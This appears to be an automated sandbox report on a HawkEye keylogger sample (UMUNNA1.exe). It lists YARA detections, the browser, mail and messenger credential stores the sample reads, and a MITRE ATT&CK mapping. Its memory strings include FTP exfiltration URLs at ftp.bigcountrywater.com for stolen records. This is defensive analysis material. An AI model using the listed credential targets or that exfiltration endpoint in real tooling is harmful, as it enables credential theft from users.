Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 6_2_0041604B GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,

6_2_0041604B

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 5_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,

5_2_0040724C

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 5_2_00406278 GetVersionExA,

5_2_00406278

Source: C:\Users\user\Desktop\UMUNNA1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\UMUNNA1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\UMUNNA1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected HawkEye Keylogger

Show sources

Source: Yara match	File source: 4.2.UMUNNA1.exe.88fa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UMUNNA1.exe.3d8fe4e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UMUNNA1.exe.830000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UMUNNA1.exe.839c0d.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UMUNNA1.exe.3d8fe4e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UMUNNA1.exe.838208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UMUNNA1.exe.3d96256.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UMUNNA1.exe.3d97c5b.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UMUNNA1.exe.2b88df0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.922393547.0000000002B61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UMUNNA1.exe PID: 6940, type: MEMORY
Source: Yara match	File source: Process Memory Space: UMUNNA1.exe PID: 5052, type: MEMORY

Yara detected MailPassView

Show sources

Source: Yara match	File source: 4.2.UMUNNA1.exe.88fa72.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UMUNNA1.exe.3b67e00.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UMUNNA1.exe.88fa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UMUNNA1.exe.3b67e00.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UMUNNA1.exe.3d8fe4e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UMUNNA1.exe.830000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UMUNNA1.exe.839c0d.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UMUNNA1.exe.3d8fe4e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UMUNNA1.exe.838208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UMUNNA1.exe.3d96256.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UMUNNA1.exe.3d97c5b.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.682749011.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.923406374.0000000003B61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UMUNNA1.exe PID: 6940, type: MEMORY
Source: Yara match	File source: Process Memory Space: UMUNNA1.exe PID: 5052, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 4116, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data			Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior

Tries to steal Mail credentials (via file registry)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword	5_2_00402D9A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword	5_2_00402D9A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: ESMTPPassword	5_2_004033D7

Yara detected WebBrowserPassView password recovery tool

Show sources

Source: Yara match	File source: 4.2.UMUNNA1.exe.3b80020.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UMUNNA1.exe.839c0d.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UMUNNA1.exe.3b80020.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UMUNNA1.exe.3b67e00.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UMUNNA1.exe.3d97c5b.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UMUNNA1.exe.3d8fe4e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UMUNNA1.exe.830000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UMUNNA1.exe.839c0d.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UMUNNA1.exe.3d8fe4e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UMUNNA1.exe.838208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UMUNNA1.exe.3d96256.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UMUNNA1.exe.3d97c5b.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.688595177.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.923406374.0000000003B61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UMUNNA1.exe PID: 6940, type: MEMORY
Source: Yara match	File source: Process Memory Space: UMUNNA1.exe PID: 5052, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 660, type: MEMORY

Remote Access Functionality:

Detected HawkEye Rat

Show sources

Source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp	String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp	String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger \| Execution Confirmed \|
Source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp	String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger \| Stealer Records \|
Source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp	String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
Source: UMUNNA1.exe, 00000004.00000002.922662980.0000000002CB5000.00000004.00000001.sdmp	String found in binary or memory: qA@HawkEye_Keylogger_Stealer_Records_813435 7.4.2021 9:32:15 AM.txt
Source: UMUNNA1.exe, 00000004.00000002.922662980.0000000002CB5000.00000004.00000001.sdmp	String found in binary or memory: q_^ftp://ftp.bigcountrywater.com/HawkEye_Keylogger_Stealer_Records_813435 7.4.2021 9:32:15 AM.txt
Source: UMUNNA1.exe, 00000004.00000002.922662980.0000000002CB5000.00000004.00000001.sdmp	String found in binary or memory: ftp://ftp.bigcountrywater.com/HawkEye_Keylogger_Stealer_Records_813435%207.4.2021%209:32:15%20AM.txt
Source: UMUNNA1.exe, 00000004.00000002.922662980.0000000002CB5000.00000004.00000001.sdmp	String found in binary or memory: qedftp://ftp.bigcountrywater.com/HawkEye_Keylogger_Stealer_Records_813435%207.4.2021%209:32:15%20AM.txt
Source: UMUNNA1.exe, 00000004.00000002.922687241.0000000002CBB000.00000004.00000001.sdmp	String found in binary or memory: qBA/HawkEye_Keylogger_Stealer_Records_813435 7.4.2021 9:32:15 AM.txt
Source: UMUNNA1.exe, 00000004.00000002.922687241.0000000002CBB000.00000004.00000001.sdmp	String found in binary or memory: qA@HawkEye_Keylogger_Stealer_Records_813435 7.4.2021 9:32:15 AM.txtd8Lq(
Source: UMUNNA1.exe, 00000004.00000002.922687241.0000000002CBB000.00000004.00000001.sdmp	String found in binary or memory: qHGSTOR HawkEye_Keylogger_Stealer_Records_813435 7.4.2021 9:32:15 AM.txt
Source: UMUNNA1.exe, 00000004.00000002.922393547.0000000002B61000.00000004.00000001.sdmp	String found in binary or memory: HawkEyeKeylogger
Source: UMUNNA1.exe, 00000004.00000002.922393547.0000000002B61000.00000004.00000001.sdmp	String found in binary or memory: q'&HawkEye_Keylogger_Execution_Confirmed_
Source: UMUNNA1.exe, 00000004.00000002.922393547.0000000002B61000.00000004.00000001.sdmp	String found in binary or memory: q#"HawkEye_Keylogger_Stealer_Records_
Source: UMUNNA1.exe, 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp	String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: UMUNNA1.exe, 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp	String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger \| Execution Confirmed \|
Source: UMUNNA1.exe, 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp	String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger \| Stealer Records \|
Source: UMUNNA1.exe, 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp	String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_

Yara detected HawkEye Keylogger

Show sources

Source: Yara match	File source: 4.2.UMUNNA1.exe.88fa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UMUNNA1.exe.3d8fe4e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UMUNNA1.exe.830000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UMUNNA1.exe.839c0d.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UMUNNA1.exe.3d8fe4e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UMUNNA1.exe.838208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UMUNNA1.exe.3d96256.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UMUNNA1.exe.3d97c5b.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UMUNNA1.exe.2b88df0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.922393547.0000000002B61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UMUNNA1.exe PID: 6940, type: MEMORY
Source: Yara match	File source: Process Memory Space: UMUNNA1.exe PID: 5052, type: MEMORY

Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4_2_04CE0A8E listen,	4_2_04CE0A8E
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4_2_04CE0E9E bind,	4_2_04CE0E9E
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4_2_04CE0A50 CreateMutexW,listen,	4_2_04CE0A50
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4_2_04CE0E6B bind,	4_2_04CE0E6B

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Windows Management Instrumentation1	Application Shimming1	Application Shimming1	Disable or Modify Tools1	OS Credential Dumping1	System Time Discovery1	Replication Through Removable Media1	Archive Collected Data11	Exfiltration Over Alternative Protocol1	Ingress Tool Transfer2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API11	Boot or Logon Initialization Scripts	Access Token Manipulation1	Deobfuscate/Decode Files or Information11	Input Capture1	Peripheral Device Discovery1	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Shared Modules1	Logon Script (Windows)	Process Injection412	Obfuscated Files or Information41	Credentials in Registry2	Account Discovery1	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing23	Credentials In Files1	File and Directory Discovery1	Distributed Component Object Model	Input Capture1	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading11	LSA Secrets	System Information Discovery18	SSH	Clipboard Data2	Data Transfer Size Limits	Application Layer Protocol12	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion21	Cached Domain Credentials	Query Registry1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Access Token Manipulation1	DCSync	Security Software Discovery21	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection412	Proc Filesystem	Virtualization/Sandbox Evasion21	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Hidden Files and Directories2	/etc/passwd and /etc/shadow	Process Discovery4	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Application Window Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	System Owner/User Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Rename System Utilities	Keylogging	Remote System Discovery1	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery
Compromise Hardware Supply Chain	Visual Basic	Scheduled Task	Scheduled Task	Masquerade Task or Service	GUI Input Capture	System Network Configuration Discovery1	Exploitation of Remote Services	Email Collection	Commonly Used Port	Proxy			Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
UMUNNA1.exe	81%	Virustotal		Browse
UMUNNA1.exe	29%	Metadefender		Browse
UMUNNA1.exe	66%	ReversingLabs	ByteCode-MSIL.Hacktool.Generic
UMUNNA1.exe	100%	Avira	HEUR/AGEN.1105293
UMUNNA1.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
4.2.UMUNNA1.exe.3b0000.0.unpack	100%	Avira	HEUR/AGEN.1105293	Download File
0.2.UMUNNA1.exe.540000.0.unpack	100%	Avira	HEUR/AGEN.1105293	Download File
4.0.UMUNNA1.exe.3b0000.0.unpack	100%	Avira	HEUR/AGEN.1105293	Download File
0.0.UMUNNA1.exe.540000.0.unpack	100%	Avira	HEUR/AGEN.1105293	Download File
6.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1125438	Download File
0.2.UMUNNA1.exe.3d8fe4e.4.unpack	100%	Avira	TR/Inject.vcoldi	Download File
4.2.UMUNNA1.exe.830000.1.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
4.2.UMUNNA1.exe.830000.1.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File

Domains

Source	Detection	Scanner	Link
bigcountrywater.com	9%	Virustotal	Browse
123.105.12.0.in-addr.arpa	0%	Virustotal	Browse
ftp.bigcountrywater.com	3%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/dvI	0%	Avira URL Cloud	safe
http://www.fonts.com)W	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/yI	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/7I	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htmS	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/Y0rooI	0%	Avira URL Cloud	safe
http://www.fonts.comccW:	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.fontbureau.coma	0%	URL Reputation	safe
http://www.fontbureau.coma	0%	URL Reputation	safe
http://www.fontbureau.coma	0%	URL Reputation	safe
http://www.fonts.comX	0%	URL Reputation	safe
http://www.fonts.comX	0%	URL Reputation	safe
http://www.fonts.comX	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/-czKI	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y0/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y0/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y0/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/a-dRI	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/p	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/p	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/p	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/es-e	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/adnl	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/adnl	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/adnl	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/%I	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bigcountrywater.com	155.254.17.54	true	true	9%, Virustotal, Browse	unknown
whatismyipaddress.com	104.16.155.36	true	false		high
123.105.12.0.in-addr.arpa	unknown	unknown	false	0%, Virustotal, Browse	unknown
ftp.bigcountrywater.com	unknown	unknown	true	3%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://whatismyipaddress.com/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/dvI	UMUNNA1.exe, 00000000.00000003.658995751.000000000514A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com)W	UMUNNA1.exe, 00000000.00000003.656564325.000000000515B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.tiro.com	UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/yI	UMUNNA1.exe, 00000000.00000003.658995751.000000000514A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://whatismyipaddress.com/-	UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/7I	UMUNNA1.exe, 00000000.00000003.658718286.0000000005151000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://login.yahoo.com/config/login	vbc.exe	false		high
http://www.fonts.com	UMUNNA1.exe, 00000000.00000003.656710705.0000000005175000.00000004.00000001.sdmp, UMUNNA1.exe, 00000000.00000003.656517724.0000000005175000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	false		high
